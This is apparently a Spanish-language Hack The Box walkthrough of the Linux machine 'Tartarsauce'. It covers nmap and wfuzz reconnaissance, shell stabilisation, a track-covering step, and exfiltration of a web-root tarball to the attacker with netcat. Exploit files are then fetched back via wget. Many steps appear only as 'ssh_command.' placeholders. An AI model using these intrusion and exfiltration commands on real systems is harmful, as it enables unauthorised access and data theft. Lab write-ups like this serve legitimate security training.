Tartarsauce

Tartarsauce


HTB Linux

nmap -p- —open -T5 -v -n 10.129.1.185

nmap -p- -sS —min-rate 5000 —open -vvv -n -Pn 10.129.1.185 -oG allPorts

ssh_command.

extractPorts allPorts

nmap -sCV -p80 10.129.1.185 -oN targeted

whatweb http://10.129.1.185

ssh_command.

ssh_command.

ssh_command.

wfuzz -c -t 400 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.185/webservices/FUZZ

ssh_command.

echo “10.129.1.185 tartarsauce.htb” | sudo tee -a /etc/hosts

ssh_command.

wfuzz -c -t 200 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.185/webservices/FUZZ

ssh_command.

vim wp-load.php

ssh_command.

ssh_command.

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 51 columns 189

ssh_command.

ssh_command.

#para borrar huellas

ssh_command.

ssh_command.

watch ls -la /var/tmp

ssh_command.

systemctl list-timers

ssh_command.

tar -zcvf backup.tar /var/www/html

Hacemos un tar del directorio.

pasar archivo de linux a linux

ssh_command.

Desde la maquina atacada mandamos el archivo a kali

nc 10.10.14.108 443 < backup.tar

Y en kali recibimos el archivo comprimido

nc -lvnp 443 > backup.tar

ssh_command.

tar -xf backup.tar

ssh_command.

Hacemos el siguiente script y lo corremos

ssh_command.

ssh_command.

Comprimimos el directorio de nuevo

tar -zcvf backup.tar /var/www/html

ssh_command.

python3 -m http.server 80

wget http://10.10.14.108/backup.tar

ssh_command.

chmod +x ne_exploit.sh

Le damos permisos de ejecucion.

ssh_command.

© 2025 Cu3rv0x